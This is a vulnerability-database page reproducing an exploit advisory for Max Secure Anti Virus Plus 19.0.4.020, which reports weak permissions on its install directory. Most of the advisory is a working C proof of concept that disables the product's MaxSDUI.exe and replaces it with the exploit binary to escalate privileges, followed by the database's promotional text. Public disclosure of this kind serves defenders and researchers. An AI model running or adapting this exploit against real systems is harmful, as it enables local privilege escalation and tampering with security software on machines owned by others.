Vulners
Lucene search
Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions Vulnerability
# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
# Discovery by: hyp3rlinx
# Vendor Homepage: www.maxpcsecure.com
# Tested Version: 19.0.4.020
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec
[Vendor]
www.maxpcsecure.com
[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020
File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe
[Vulnerability Type]
Insecure Permissions
[CVE Reference]
N/A
[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory.
Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.
C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
[Affected Component]
Permissions on installation directory
[Exploit/POC]
#include <stdio.h>
#include <windows.h>
#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"
/* Max Secure Anti Virus Plus PoC By hyp3rlinx */
BOOL PWNED=FALSE;
BOOL FileExists(LPCTSTR szPath){
DWORD dwAttrib = GetFileAttributes(szPath);
return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}
void main(void){
if(!FileExists(DISABLED_TARGET)){
CopyFile(TARGET, TMP, FALSE);
Sleep(1000);
CopyFile(TMP, DISABLED_TARGET, FALSE);
printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
Sleep(1000);
printf("[+] Disabled MaxSDUI.exe ...\n");
Sleep(300);
}else{
PWNED=TRUE;
}
if(!PWNED){
char fname[MAX_PATH];
char newLoc[]=TARGET;
DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
if (size){
printf("[+] Copying exploit to vuln dir...\n");
Sleep(1000);
CopyFile(fname, TARGET, FALSE);
printf("[+] Replaced legit Max Secure EXE...\n");
Sleep(2000);
printf("[+] Done!\n");
MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
Sleep(1000);
exit(0);
}
}else{
if(FileExists(TMP)){
remove(TMP);
}
printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
printf("[+] hyp3rlinx\n");
system("pause");
}
}
[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2019 00:00Current
0.2Low risk
Vulners AI Score0.2